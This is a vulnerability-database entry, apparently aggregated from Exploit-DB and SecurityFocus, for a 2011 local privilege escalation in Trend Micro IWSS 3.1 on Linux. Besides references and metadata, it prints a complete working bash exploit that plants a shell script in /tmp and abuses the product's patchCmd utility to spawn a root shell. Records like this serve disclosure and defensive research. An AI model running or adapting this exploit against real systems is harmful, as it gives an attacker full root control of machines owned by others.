Sign-up

ID

VAR-E-201110-0290


EDB ID

36257


TITLE

Trend Micro IWSS 3.1 - Local Privilege Escalation - Linux local Exploit

Trust: 0.6

sources: EXPLOIT-DB: 36257

DESCRIPTION

Trend Micro IWSS 3.1 - Local Privilege Escalation.. local exploit for Linux platform

Trust: 0.6

sources: EXPLOIT-DB: 36257

AFFECTED PRODUCTS

vendor:trend micromodel:iwssscope:eqversion:3.1

Trust: 1.0

vendor:trendmicromodel:iwssscope:eqversion:3.1

Trust: 0.6

vendor:trend micromodel:interscan websecuritysuitescope:eqversion:3.1

Trust: 0.3

sources: BID: 50380 // EXPLOIT-DB: 36257 // EDBNET: 57609

EXPLOIT

source: https://www.securityfocus.com/bid/50380/info

Trendmicro IWSS is prone to a local privilege-escalation vulnerability.

Local attackers can exploit this issue to execute arbitrary code with root privileges and completely compromise the affected computer.

Trendmicro IWSS 3.1 is vulnerable; other versions may also be affected.

#!/bin/bash
# Copyright 2011 Buguroo Offensive Security - jrvilla.AT.buguroo.com

cd /tmp
echo "[*] Creating shell file"
echo -e "#!/bin/bash\n/bin/bash" > PatchExe.sh
echo "[*] Change permissions"
chmod 755 PatchExe.sh
echo "[*] Got r00t... Its free!"
/opt/trend/iwss/data/patch/bin/patchCmd u root

Trust: 1.0

sources: EXPLOIT-DB: 36257

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 36257

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 36257

TYPE

Local Privilege Escalation

Trust: 1.0

sources: EXPLOIT-DB: 36257

CREDITS

Buguroo Offensive Security

Trust: 0.6

sources: EXPLOIT-DB: 36257

EXTERNAL IDS

db:EXPLOIT-DBid:36257

Trust: 1.9

db:BIDid:50380

Trust: 1.9

db:EDBNETid:57609

Trust: 0.6

sources: BID: 50380 // EXPLOIT-DB: 36257 // EDBNET: 57609

REFERENCES

url:https://www.securityfocus.com/bid/50380/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/36257/

Trust: 0.6

url:http://buguroo.com/adv/bsa-2011-002.txt

Trust: 0.3

url:https://www.exploit-db.com/exploits/36257

Trust: 0.3

url:http://us.trendmicro.com/us/products/enterprise/interscan-web-security-suite/

Trust: 0.3

sources: BID: 50380 // EXPLOIT-DB: 36257 // EDBNET: 57609

SOURCES

db:BIDid:50380
db:EXPLOIT-DBid:36257
db:EDBNETid:57609

LAST UPDATE DATE

2022-07-27T09:38:15.373000+00:00


SOURCES UPDATE DATE

db:BIDid:50380date:2011-10-26T00:00:00

SOURCES RELEASE DATE

db:BIDid:50380date:2011-10-26T00:00:00
db:EXPLOIT-DBid:36257date:2011-10-26T00:00:00
db:EDBNETid:57609date:2011-10-26T00:00:00